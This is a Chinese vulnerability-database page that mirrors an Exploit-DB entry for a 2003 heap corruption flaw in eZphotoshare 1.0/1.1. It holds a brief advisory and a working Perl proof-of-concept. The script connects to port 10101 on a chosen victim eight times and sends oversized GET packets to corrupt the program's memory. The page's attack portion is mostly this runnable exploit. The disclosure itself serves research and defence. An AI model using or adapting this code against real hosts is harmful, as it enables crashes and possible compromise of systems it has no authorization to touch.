EZPhotoShare 1.0/1.1 – Memory Corruption

EZPhotoShare 1.0/1.1 – Memory Corruption

漏洞ID 1054277 漏洞类型
发布时间 2003-12-03 更新时间 2003-12-03
图片[1]-EZPhotoShare 1.0/1.1 – Memory Corruption-安全小百科CVE编号 N/A
图片[2]-EZPhotoShare 1.0/1.1 – Memory Corruption-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23412
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9150/info

eZphotoshare has been reported prone to multiple remote memory corruption vulnerabilities. The issues present themselves in the routines employed by eZphotoshare to handle network based communications. It has been reported that a remote attacker may overrun the bounds of a reserved buffer in eZphotoshare process memory by transmitting a number of malicious packets to the host that is running eZphotoshare.

This activity will ultimately result in the corruption of variables that are saved adjacent to the affected buffer. These variables are crucial to the operation of the vulnerable software.

#
#!/usr/bin/perl -w
#
# Heap Corruption Vulnerability in eZphotoshare PoC
#  - by Peter Winter-Smith [[email protected]]

use IO::Socket;

if(!($ARGV[0]))
{
print "Usage: eZpsheap.pl <victim>nn";
exit;
}

print "Heap Corruption PoCn";

for($n=1;$n<9;$n++){

$victim = IO::Socket::INET->new(Proto=>'tcp',
                               PeerAddr=>$ARGV[0],
                               PeerPort=>"10101")
                           or die "Unable to connect to $ARGV[0] on port 10101";

$eax = "ABCD";
$ecx = "XXXX";

$packet = "GET /aaa" . $eax . $ecx . "a"x64;

print $victim $packet;

print " + Sending packet number $n of 8 ...n";

sleep(1);

close($victim); }

print "Done.n";
exit;

相关推荐: HP Tru64/TruCluster OSIS V5.4 LDAP模块未授权文件访问漏洞

HP Tru64/TruCluster OSIS V5.4 LDAP模块未授权文件访问漏洞 漏洞ID 1203617 漏洞类型 权限许可和访问控制 发布时间 2002-11-13 更新时间 2002-12-31 CVE编号 CVE-2002-2265 CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享